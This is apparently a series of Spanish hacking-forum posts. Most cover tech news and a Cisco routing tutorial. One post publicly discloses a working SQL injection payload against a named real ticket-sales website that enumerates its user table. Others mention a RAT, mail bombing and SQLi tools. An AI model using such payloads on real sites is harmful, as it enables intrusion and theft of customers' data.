La situación no es mejor en los TGUs de otros fabricantes, según ha podido saber José Carlos Norte por otros investigadores: "Yo he denunciado el caso más grave, pero el estado de seguridad de los TGUs es lamentable, contraseñas por defecto, etc". El problema, afirma es que son aparatos que van embedidos en el camión, lo que dificulta las actualizaciones de seguridad. Y, para colmo, dice el hacker, "el estado de su seguridad ya es malo, porque son dispositivos del siglo pasado, de una industria no preparada para hoy en día, pero además van y los conectan a Internet".

José Carlos nos deja mientras, por otra línea, la revista "Wired" le pide una entrevista. Queda lejos de ese triunfador el José Carlos chaval de 18 años a quién en 2006 detenía la Guardia Civil No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Le requisaron todo el material informático de su casa e incluso fueron a la primera empresa que le había dado empleo a conminarles para que le despediesen.

Su delito de juventud: liderar a un grupo de chavales que asaltaron las páginas web de diversos medios de comunicación, entre ellos Telemadrid y La Cope. "No teníamos a nadie que nos enseñase, estábamos totalmente desbocados y íbamos probando cosas", explica. Tuvo que esperar ocho años para ser juzgado y, finalmente, un acuerdo entre las partes le permitió declararse culpable a cambio de una multa de 60 euros. ¡No está mal para un completo autodidacta!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autora: Mercè Molist


#173
Saludos, he decidido crear este debate pensando en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que realicé para la sección Noticias informáticas.

Al final de la noticia les plantearé el tema a discutir.


Estudiantes españoles crean un sistema para cargar el móvil con la energía de las plantas



La fotosíntesis es el proceso biológico más importante de la Tierra. Sin la habilidad de las plantas para convertir la luz del sol y la materia inorgánica en compuestos orgánicos, la vida sería imposible en nuestro planeta. Gracias a tres jóvenes estudiantes andaluces, también será posible cargar el móvil con una simple maceta.


Bioo es una batería biológica que contiene microorganismos capaces de romper las moléculas de metabolitos que la planta no utiliza para transformarlos en energía. "Sirve para obtener electricidad a partir de la fotosíntesis", aclara a Teknautas el estudiante de ingeniería multimedia de la Universidad Ramón Llull y cocreador de la tecnología, Pablo Vidarte.

La idea verá la luz en abril como una campaña de 'crowdfunding' en la plataforma Indiegogo. Por 99 euros, los mecenas del proyecto conseguirán una maceta capaz de cargar el móvil dos o tres veces al día, una vez crezca la planta. Vidarte explica que este prototipo inicial es una toma de contacto para conseguir visibilidad y atraer a los primeros clientes.

Después de lanzar la maceta-cargador, Vidarte y sus compañeros se centrarán en fabricar paneles de un metro cuadrado para el jardín. El estudiante asegura que cada uno de ellos "puede generar una potencia de entre 3 y 40 vatios". Alimentar una casa entera requeriría un terreno "de cien metros cuadrados", pero puede reducirse esta área a quince metros cuadrados si en lugar de plantas bajas se utilizan arbustos o árboles.

Por 99 euros, los mecenas del proyecto conseguirán una maceta capaz de cargar el móvil un par de veces al día (una vez crezca la planta)

Vidarte explica que aunque la eficacia de los paneles no supera a la de sus homólogos solares, producen electricidad día y noche a una potencia constante. La energía solar y eólica, por el contrario, es más irregular y requiere una instalación "mucho más cara".

La tecnología no es apta para urbanitas, pero el estudiante considera que aquellos usuarios que dispongan de una zona verde pueden amortizarla con estos paneles. El emprendedor asegura que una instalación de paneles solares cuesta entre 10.000 y 20.000 euros y se amortizan en diez o veinte años. El precio de cada placa bio de un metro cuadrado será de 300 euros, por lo que los diez necesarios para un hogar medio saldrían por 3.000 euros. "Se amortiza en 4,4 años".

Estos paneles se colocan bajo tierra, por lo que es necesario plantar desde cero para instalarlos. Aunque ideados para las zonas ajardinadas de las casas particulares, también podrían aprovecharse en agricultura y para rentabilizar los tejados verdes de los edificios.

Los tres estudiantes presentaron su proyecto durante el pasado Mobile World Congress, y está en proceso de patente. De momento han llegado a un acuerdo con el Ayuntamiento de Sant Cugat del Vallés para que les financie las pruebas en las zonas verdes de la localidad.

Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Una vez informados sobre el tema, podemos opinar:



¿Pensaís que esta forma de obtener electricidad podría salir adelante, o se quedará estancada y será otra "anecdota" más?







Aprovecho para dejar mi opinión:

Pienso que este sistema se debe desarrollar, tiene un gran futuro. No soy ningún defensor de la naturaleza ni nada parecido, pero creo que a nuestro planeta le hace falta una recuperación forestal, las plantas son importantes, y cada vez hay menos verde y mas gris. Con esta tecnología podríamos obtener energía de una forma limpia, además de cuidar un poco más el medio ambiente. Por ahora se han conseguido buenos resultados en cuanto a potencia obtenida de una planta, y no es muy caro.

Imagínense si esto se pudiese incrementar y desarrollar.




#174


La fotosíntesis es el proceso biológico más importante de la Tierra. Sin la habilidad de las plantas para convertir la luz del sol y la materia inorgánica en compuestos orgánicos, la vida sería imposible en nuestro planeta. Gracias a tres jóvenes estudiantes andaluces, también será posible cargar el móvil con una simple maceta.

Bioo es una batería biológica que contiene microorganismos capaces de romper las moléculas de metabolitos que la planta no utiliza para transformarlos en energía. "Sirve para obtener electricidad a partir de la fotosíntesis", aclara a Teknautas el estudiante de ingeniería multimedia de la Universidad Ramón Llull y cocreador de la tecnología, Pablo Vidarte.

La idea verá la luz en abril como una campaña de 'crowdfunding' en la plataforma Indiegogo. Por 99 euros, los mecenas del proyecto conseguirán una maceta capaz de cargar el móvil dos o tres veces al día, una vez crezca la planta. Vidarte explica que este prototipo inicial es una toma de contacto para conseguir visibilidad y atraer a los primeros clientes.

Después de lanzar la maceta-cargador, Vidarte y sus compañeros se centrarán en fabricar paneles de un metro cuadrado para el jardín. El estudiante asegura que cada uno de ellos "puede generar una potencia de entre 3 y 40 vatios". Alimentar una casa entera requeriría un terreno "de cien metros cuadrados", pero puede reducirse esta área a quince metros cuadrados si en lugar de plantas bajas se utilizan arbustos o árboles.

Por 99 euros, los mecenas del proyecto conseguirán una maceta capaz de cargar el móvil un par de veces al día (una vez crezca la planta)

Vidarte explica que aunque la eficacia de los paneles no supera a la de sus homólogos solares, producen electricidad día y noche a una potencia constante. La energía solar y eólica, por el contrario, es más irregular y requiere una instalación "mucho más cara".

La tecnología no es apta para urbanitas, pero el estudiante considera que aquellos usuarios que dispongan de una zona verde pueden amortizarla con estos paneles. El emprendedor asegura que una instalación de paneles solares cuesta entre 10.000 y 20.000 euros y se amortizan en diez o veinte años. El precio de cada placa bio de un metro cuadrado será de 300 euros, por lo que los diez necesarios para un hogar medio saldrían por 3.000 euros. "Se amortiza en 4,4 años".

Estos paneles se colocan bajo tierra, por lo que es necesario plantar desde cero para instalarlos. Aunque ideados para las zonas ajardinadas de las casas particulares, también podrían aprovecharse en agricultura y para rentabilizar los tejados verdes de los edificios.

Los tres estudiantes presentaron su proyecto durante el pasado Mobile World Congress, y está en proceso de patente. De momento han llegado a un acuerdo con el Ayuntamiento de Sant Cugat del Vallés para que les financie las pruebas en las zonas verdes de la localidad.

Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#175
Saludos,

He estado buscando información sobre como enviar un e-mail anónimo, he encontrado principalmente tres métodos:

1.- Creando una cuenta con un servicio de mensajería anónima. Ej: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2.- Usando un servicio en línea para el envío de e-mails. Ej: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3.- Utilizando un servidor de reenvío.

Me gustaría conocer más metodos, ya que se que hay otros, como el mail bomber, y que me diesen su opinión sobre cuál es la mejor alternativa.

Gracias de antemano.  :D
#176
Saludos.

He descargado Spy-Net 2.7 Final de la biblioteca de Underc0de, y he seguido las instrucciones de un viejo manual de @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, junto con la información de Malware Magazine del foro.

Siguiendo todos los pasos, hasta autoinfectarme, todo bien. Después de autoinfectarme, aparecieron dos host más infectados, y esto es imposible, ya que únicamente debería estar infectado yo. No entiendo el porqué de estas infecciones y me preocupa un poco.

Al desinfectar mi equipo, los otros dos hosts desaparecieron.

¿Alguien puede aportarme la respuesta?

Gracias de antemano.
#177
Hoy les traigo otra encuesta, para responder facilito está información:

Ramas de la informática:

Base de datos

  • Minería de datos
  • Almacén de datos
  • Sistema de gestión de base de datos
  • Modelo relacional

Computación científica

  • Bioinformática
  • Computación Cuántica
  • Paradigma
  • Análisis numérico
  • Física computacional
  • Química computacional
  • Neurociencia computacional

Comunicación y seguridad

  • Canal de comunicaciones
  • Red de computadoras
  • Servidores
  • Seguridad informática
  • Criptografía
  • Protocolo

Compiladores y lenguajes de programación

  • Compilador
  • Lenguajes de programación
  • Teoría de lenguajes de programación
  • Semántica formal

Ingeniería de software

  • Ingeniería de software
  • Programación
  • Diseño de algoritmos
  • Análisis de algoritmos
  • Ingeniería inversa

Inteligencia artificial

  • Inteligencia artificial
  • Razonamiento automatizado
  • Robótica

Infografía

  • Infografía
  • Gráficos por computador
  • Procesamiento digital de imágenes
  • Geometría computacional
  • Interacción persona-computador

Sistemas

  • Computación concurrente
  • Cómputo paralelo
  • Sistemas Distribuidos


Gracias por participar. Hati.  :D
#178
Me pareció interesante realizar una encuesta de este tipo en el foro, así que aquí se la dejo.

Gracias por participar.  ;D

Saludos.
#179
                                                                                                                                        



Aquí les dejo material básico para aprender a programar con algunos ejercicios que pueden servir de ayuda.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#180


Saludos

Les dejo este material

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#181
Hacking ShowOff / [ SQLi ] www.1000tickets.com.ar
Febrero 21, 2016, 01:47:53 PM
****************************************************
   SQLi No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
****************************************************

> Site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

> Descripción del site: venta de entradas para conciertos y demás.



> Descripción de la vulnerabilidad:

  -Se encuentra un síntoma de vulnerabilidad frente a SQLi.
 
  -Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper





  -Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:





Payload:
Código: php
http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--


Método automático con SQLHelper:



Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

#182
Saludos

Llevo unos días buscando información sobre el modo monitor en Windows, se que es posible utilizarlo mediante la instalación de determinados drivers, pero ahí está el problema.

En primer lugar comprobé que mi tarjeta (Atheros AR9485) es compatible con este modo y tras un poco de búsqueda encontré que sí.

Después de mucho googlear y buscar por la red, la información útil que obtuve no fue mucha.

Leí que con el software de seguridad wireless CommView se incluía un driver apto para esto. Lo probé y nada.
Encontré algo similar pero con el programa Acrylic Wifi Proffsional, también lo probé y nada.
La página que más útil me resulto fue No tienes permitido ver los links. Registrarse o Entrar a mi cuenta donde puedes encontrar varios tutoriales de como instalar los drivers y más relacionado con el tema.

¿Alguien sabe donde podría buscar o encontrar los dirvers?

Gracias de antemano. 
#183
¿Qué es Cisco Packet Tracer?

"Es un programa de simulación de redes que permite a los estudiantes experimentar con el comportamiento de la red. Como parte integral de la Academia de Networking de Cisco, Packet Tracer provee capacidades de simulación, visualización, evaluación y colaboración y facilita la enseñanza y aprendizaje de conceptos básicos de redes."

Wikipedia:

En la página Networking Academy de Cisco (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) encontrarás documentación, cursos, certificaciones...

¿Qué es el enrutamiento?

Es la función de buscar el mejor camino entre todos los posibles en una red de paquetes, es decir, encontrar las rutas más óptimas para dirigir dichos paquetes.
En consecuencia, corresponde señalar que  entendemos por "mejor ruta"; es decir, aquella que pasa por el menor número de nodos, mantiene una buena frecuencia y ofrece el menor coste.


CONFIGURACIÓN DE DISPOSITIVOS

Para demostrar como hacer un enrutamiento básico con su correspondiente configuración, dispondremos el siguiente escenario:



Como vemos, cada ordenador está conectado a un swicht de 24 bocas FastEthernet, y este a su vez está conectado a un router 2621xm de Cisco.

Cada router cuenta con dos interfaces FastEthernet y el router del centro de la imagen cuenta además con una interfaz de red adicional FastEthernet 1/0.

Si nunca has usado Cisco Packet Tracer te darás cuenta de que es muy intuitivo y fácil de usar, hasta el momento lo único que hemos tenido que hacer es arrastrar los elementos a la pantalla.


Ahora configuraremos las IP de cada uno de los ordenadores. Para ello hacemos clic en el icono del ordenador, vamos al apartado "Desktop" y nos dirigimos a "IP Configuration", donde nos aparecerá el menú de configuración de IP. Realizaremos este paso con todos los ordenadores.




El siguiente paso es la configuración de los routers y sus correspondientes direcciones IP. Para ello hacemos clic en el icono del primer router (izquierda) y nos dirigimos al apartado CLI, que se trata una emulación de la Interfaz de Línea de Comandos de un router CISCO, y allí ejecutamos los siguientes comandos:

         Primera interfaz:

         enable                                                                                         /Entrar en modo privilegiado
         (#) configure terminal                                                                /Entrar en modo de configuración global
         (config) interface fastethernet 0/0                                            /Seleccionar interfaz a configurar
         (config-if) ip address 192.168.1.1 255.255.255.0                      /Añadir IP y máscara
         (config-if) no shutdown                                                               /No apagar
         (config-if) exit                                                                             /Salir

          Segunda interfaz:       
         (#) configure terminal   
         (config) interface fastethernet 0/1   
         (config-if) ip address 10.10.1.1 255.255.255.252
         (config-if) no shutdown   
         (config-if) exit 
   

Ahora configuraremos el router central, que cuenta con tres interfaces. Para ello seguiremos el mismo procedimiento de configuración:

          Primera interfaz:
         enable       
         (#) configure terminal   
         (config) interface fastethernet 0/0   
         (config-if) ip address 192.168.2.1 255.255.255.0
         (config-if) no shutdown   
         (config-if) exit

          Segunda interfaz:       
         (#) configure terminal   
         (config) interface fastethernet 0/1   
         (config-if) ip address  10.10.1.2 255.255.255.252
         (config-if) no shutdown   
         (config-if) exit 

          Tercera interfaz:       
         (#) configure terminal   
         (config) interface fastethernet 1/0   
         (config-if) ip address  10.10.2.2 255.255.255.252
         (config-if) no shutdown   
         (config-if) exit


Solo falta configurar el router de la derecha, de la misma forma que los anteriores:

          Primera interfaz:
         enable       
         (#) configure terminal   
         (config) interface fastethernet 0/0   
         (config-if) ip address  192.168.3.1 255.255.255.0
         (config-if) no shutdown   
         (config-if) exit

          Segunda interfaz:       
         (#) configure terminal   
         (config) interface fastethernet 0/1   
         (config-if) ip address  10.10.2.1 255.255.255.252
         (config-if) no shutdown   
         (config-if) exit


Ya están configurados todos los routers y los ordenadores. Ahora procedemos a realizar el enrutamiento de todas las redes de nuestro escenario, que actualmente sería este:



ENRUTAMIENTO

El primer router que configuraremos será el router de la izquierda. Clic sobre él y nos dirigimos a la pestaña CLI para ejecutar los siguientes comandos:

         enable       
         (#) configure terminal   
         (config) ip route 192.168.0.0 255.255.0.0 10.10.1.2   

Con el comando ip route conseguimos dirigir los "saltos".

El siguiente router que configuraremos será el de la derecha, de la misma manera que en el caso anterior:

         enable       
         (#) configure terminal   
         (config)ip route 192.168.0.0 255.255.0.0 10.10.2.1 

Solo queda por configurar el router del centro, en este caso tenemos que introducir las rutas fijas 192.168.1.0/24 y 192.168.3.0/24. Lo haremos de la siguiente forma:

         enable       
         (#) configure terminal   
         (config) ip route 192.168.1.0 255.255.255.0 10.10.1.1
         (config) ip route 192.168.3.0 255.255.255.0 10.10.2.2

Con esto, el enrutamiento estaría realizado.
Para comprobarlo haremos ping desde un pc, a otro que no esté en su misma red. Para hacer ping, clic a un pc, ir a desktop, y Command Promt.

Desde 192.168.1.2 > ping 192.168.2.1
Desde 192.168.1.2 > ping 192.168.3.1




Tras realizar el enrutamiento, deberemos guardar la configuración, para que cuando se reinicie el router no la perdamos. Esto se hace desde CLI en cada router:

         enable       
         (#) copy running-config startup-config

Ya tendríamos la red preparada para funcionar, con su respectiva configuración y enrutamiento. Hay otros comandos que es interesante conocer:

Para ver la configuración de cada ruter:
         enable       
         (#) show running-config

Para cambiar la contraseña de configuración del router:
         enable       
         (#) configure terminal 
         (config) enable password 12345 

Para cambiar el nombre de un dispositivo Cisco:
         enable       
         (#) configure terminal 
         (config) hostname nombre


#184
Hola, viendo lo interesante y lo bien adaptados que están cualquier nivel los dos primeros talleres sobre Pentesting con Kali Linux, y aprovechando que acaban de sacar una nueva versión, me gustaría saber si continuarán con ellos. Creo que sería una buena idea retomarlos.
#185
Buenas, hace poco me interese por las vulnerabilidades en bases de datos SQL. Buscando he encontrado una página con una vulnerabilidad importante. Se pueden obtener los nick, pass, email, nombre, apellidos, teléfono, dirección, etc de muchos usuarios.

Creo que lo conveniente sería avisar a la propia página de la vulnerabilidad pero no se si esto podría tener repercusiones negativas hacia mí.
#186
He buscado en el Gran Google pero no encuentro un enlace "de fiar" para descargar la herramienta Sql Poizon.

Muchas gracias de antemano.
#187
Alguien puede decirme algun sitio donde descargar la herramienta Havij?